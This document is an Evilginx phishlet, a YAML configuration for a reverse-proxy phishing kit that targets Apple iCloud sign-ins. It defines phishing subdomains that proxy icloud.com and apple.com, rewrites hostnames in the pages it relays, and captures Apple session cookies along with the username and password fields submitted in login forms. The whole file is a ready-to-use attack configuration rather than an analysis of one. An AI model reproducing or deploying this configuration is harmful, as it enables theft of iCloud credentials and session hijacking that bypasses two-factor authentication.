author: '@AN0NUD4Y'
min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: 'www', orig_sub: 'www', domain: 'icloud.com', session: true, is_landing: true}
  - {phish_sub: 'apple', orig_sub: 'www', domain: 'apple.com', session: false, is_landing: false}
  - {phish_sub: 'setup', orig_sub: 'setup', domain: 'icloud.com', session: false, is_landing: false}
  - {phish_sub: 'feedbackws', orig_sub: 'feedbackws', domain: 'icloud.com', session: false, is_landing: false}
  - {phish_sub: 'snapengage', orig_sub: 'www', domain: 'snapengage.com', session: false, is_landing: false}  
  - {phish_sub: 'idmsa', orig_sub: 'idmsa', domain: 'apple.com', session: false, is_landing: false}  
  - {phish_sub: 'cdn', orig_sub: 'cdn', domain: 'apple-cloudkit.com', session: false, is_landing: false}  

sub_filters:
  - {triggers_on: 'www.icloud.com', orig_sub: 'www', domain: 'icloud.com', search: 'https://{hostname}', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.icloud.com', orig_sub: 'www', domain: 'icloud.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
 
  - {triggers_on: 'www.icloud.com', orig_sub: 'idmsa', domain: 'apple.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}  
  - {triggers_on: 'www.icloud.com', orig_sub: 'idmsa', domain: 'apple.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}  
  
  - {triggers_on: 'www.icloud.com', orig_sub: 'www', domain: 'apple.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'www.icloud.com', orig_sub: 'www', domain: 'apple.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
auth_tokens:
  - domain: 'idmsa.apple.com'
    keys: ['sessionid','.*,regexp']
credentials:
  username:
    key: 'accountName'
    search: '(.*)'
    type: 'post'
  password:
    key: 'password'
    search: '(.*)'
    type: 'post'
login:
  domain: 'www.icloud.com'
  path: ''
